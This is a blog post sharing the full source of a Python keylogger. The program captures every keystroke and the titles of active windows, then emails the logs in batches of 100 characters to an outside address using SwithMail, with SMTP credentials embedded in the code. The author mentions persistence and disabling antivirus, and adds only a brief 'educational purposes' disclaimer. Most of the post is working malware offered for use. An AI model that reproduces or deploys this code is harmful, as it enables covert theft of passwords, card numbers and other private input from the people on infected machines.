Wednesday, July 20, 2022

Stealth Keylogger and Auto Send Email

Hackers usually once gained entry into the network and acquired admin access, one of the first things they do is upload viruses and stealth apps like  keyloggers to steal information like usernames and passwords or perhaps credit card number. 

I have created a simple application in python to record every pressed keys, capture the window title of active window and once the recorded characters reaches certain length(100 characters), the program will automatically send it to the hacker's email address. This app will stay on the target machine if an antivirus was not able to detect it, that is why I have to turn off my antivirus software while making this program because it automatically deletes it even when I have already included the script to the exception list. Staying in the target for sometime is called persistence.

This is for educational purposes only and it is meant as a tool for any authorized penetration testing. Stealing password and username is illegal you will end up in jail once cought.


The code:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
import pynput as putty
import logging
import os
import pyautogui

logkeys=''
logkeys_limit = 100 
logging.basicConfig(filename=("keylog.txt"), level=logging.DEBUG, format="%(message)s")
 
def on_press(key):
    logging.info(str(key))
    if key == putty.keyboard.Key.esc:
        keyboard_listener.stop()
        mouse_listener.stop()
        quit()
    global logkeys
      

    if len(logkeys) >= logkeys_limit:            
            send_log() 
            logkeys = ''
    elif key == putty.keyboard.Key.shift_l or key == putty.keyboard.Key.shift_r:
        return
    elif key == putty.keyboard.Key.enter:
         logkeys += '~'
    elif key == putty.keyboard.Key.space:
         logkeys += ' '     
    elif key == putty.keyboard.Key.backspace:
        logkeys = logkeys[:-1]
    else:
        char = f'{key}'
        char = char[1:-1]
        logkeys += char
   
def on_click(x, y, button, pressed):
    global logkeys
    
    window_title = str(pyautogui.getActiveWindowTitle())
    logkeys += '~'
    logkeys += window_title
    logkeys += '~'
    if len(logkeys) >= logkeys_limit:            
            send_log() 
            logkeys = ''
def send_log():
    global logkeys
    cmd = 'SwithMail.exe /s /from "haha@gmail.com" /name "name" /pass "khczysagbdifmzxj" /server "smtp.gmail.com" /p "587" /SSL /to "hoho@yahoo.com" /sub "logs" /b "' + logkeys + '"'
    os.system('cmd /c "'+ cmd + '"')
     

keyboard_listener = putty.keyboard.Listener(on_press=on_press)
mouse_listener = putty.mouse.Listener(on_click=on_click)


keyboard_listener.start()
mouse_listener.start()
keyboard_listener.join()
mouse_listener.join()

By at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)